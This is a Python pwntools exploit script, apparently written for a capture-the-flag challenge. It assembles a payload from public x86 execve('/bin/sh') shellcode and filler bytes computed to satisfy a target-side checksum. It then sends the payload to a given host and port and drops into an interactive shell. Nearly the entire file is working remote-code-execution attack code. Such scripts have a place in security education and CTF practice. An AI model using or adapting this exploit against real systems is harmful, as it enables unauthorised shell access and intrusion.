#!/usr/bin/env python2
from pwn import * # https://pypi.python.org/pypi/pwntools
import argparse
# CTF-style exploit client: builds a fixed-length payload whose byte sum must
# equal cmp_sum (a checksum gate on the target side, presumably — the check
# itself is not visible here), then delivers it and drops into a shell session.
#
# Command line: <host> <port> of the target service.
parser = argparse.ArgumentParser()
parser.add_argument('host')
parser.add_argument('port', type=int)
args = parser.parse_args()
# Verbose pwntools tracing so every send/recv is printed (useful for replaying
# the session against a packet capture).
context.log_level = 'debug'
# Total bytes the payload must occupy; presumably the target's read size.
read_len = 0x3d
# Four bytes whose tail (funptr[1:]) is counted in the checksum below; the
# leading byte is supplied by the "\xff" that opens the payload — TODO confirm
# against the target binary.
funptr = "\x47\x47\xff\xe7"
# Checksum value the padding loop steers the byte sum towards.
cmp_sum = 0x1ee7
# http://shell-storm.org/shellcode/files/shellcode-827.php
# Public 23-byte x86 Linux execve("/bin/sh") shellcode from the cited page
# ("/bin//sh" is visible in the bytes; ends in int 0x80).
shellcode = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" + \
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# 0x97 is the single-byte x86 opcode xchg edi, eax.
xchg_edi_eax = "\x97"
# Payload parts; the filler is inserted at index 2 once its bytes are known.
payload = ["\xff", shellcode, xchg_edi_eax]
# Number of filler bytes needed to reach read_len.
l = read_len - len(''.join(payload))
# Filler starts as all 0x01 (never 0x00) and is raised below.
s = [1] * l
i = 0
# Byte sum of everything that participates in the checksum: the fixed payload
# parts, the filler, and funptr without its first byte.
measure = lambda: sum(map(ord,''.join(payload))) + sum(s) + sum(map(ord,funptr[1:]))
# Raise one filler byte at a time by at most 254 (so it stays <= 0xff) until
# the sum reaches cmp_sum. Assumes l bytes of filler can absorb the
# difference; otherwise s[i] raises IndexError. No loop runs if the sum is
# already >= cmp_sum.
while measure() < cmp_sum:
    d = cmp_sum - measure()
    s[i] += min(255 - 1, d)
    i += 1
# Place the filler between the shellcode and the xchg byte.
payload.insert(2, ''.join(map(chr,s)))
payload = ''.join(payload)
# Log the final bytes and their sum for comparison with cmp_sum.
log.info(repr(payload))
log.info(str(sum(map(ord,payload))))
# Connect, consume the target's opening line, deliver the payload, then
# pause briefly before the first command and hand the session to the user.
p = remote(args.host, args.port)
p.recvline()
p.send(payload)
time.sleep(0.2)
p.sendline('id')
p.interactive()